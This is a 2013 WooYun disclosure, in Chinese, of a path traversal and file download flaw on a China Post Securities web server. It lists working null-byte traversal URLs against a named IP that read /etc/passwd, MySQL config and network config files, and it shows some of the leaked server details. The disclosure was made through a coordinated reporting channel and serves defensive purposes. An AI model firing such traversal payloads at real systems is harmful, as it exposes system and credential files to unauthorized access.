漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-039195
漏洞标题:中邮证券某站系统文件遍历与下载
相关厂商:中邮证券
漏洞作者: 霍大然
提交时间:2013-10-09 16:38
修复时间:2013-11-23 16:39
公开时间:2013-11-23 16:39
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:11
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-10-09: 细节已通知厂商并且等待厂商处理中
2013-10-13: 厂商已经确认,细节仅向厂商公开
2013-10-23: 细节向核心白帽子及相关领域专家公开
2013-11-02: 细节向普通白帽子公开
2013-11-12: 细节向实习白帽子公开
2013-11-23: 细节向公众公开
简要描述:
中邮证券某站系统文件遍历与下载
详细说明:
问题站点:
http://103.22.252.251/
是手机网站还是什么原因,网站做的真不咋地,但可以看出是中邮证券的:
遍历页面及参数
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/*%00.jpg
一、passwd文件,看看有哪些用户
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg
二、版本的linux
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../proc/version%00.jpg
很奇怪的版本,小菜没用过
三、网络信息
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0%00.jpg
eth0如下:
DEVICE=eth0
USERCTL=no
ONBOOT=yes
MASTER=bond0
SLAVE=yes
BOOTPROTO=none
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1%00.jpg
eth1如下:
DEVICE=eth1
USERCTL=no
ONBOOT=yes
MASTER=bond0
SLAVE=yes
BOOTPROTO=none
可以看到用了bond0,双网卡绑定,果断看bond0:
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-bond0%00.jpg
内容如下:
DEVICE=bond0
IPADDR=18.1.7.129
NETMASK=255.255.255.192
ONBOOT=yes
BOOTPROTO=none
USERCTL=no
四、服务信息
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/services%00.jpg
五、看到装了mysql
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/my.cnf%00.jpg
默认配置
六、hosts文件
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/hosts%00.jpg
怪不得有这问题,原来用了同花顺,他们从不补漏洞的。
据说是优化TCP\IP协议的文件
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysctl.conf%00.jpg
七、标准化界面的管理和操作用户和组账号的库
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/libuser.conf%00.jpg
漏洞证明:
修复方案:
让同花顺解决
版权声明:转载请注明来源 霍大然@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-10-13 21:21
厂商回复:
CNVD确认并复现所述情部我,已经转由CNCERT通报证券行业信息化主管部门,由其通报涉事单位处置。
rank 10
最新状态:
暂无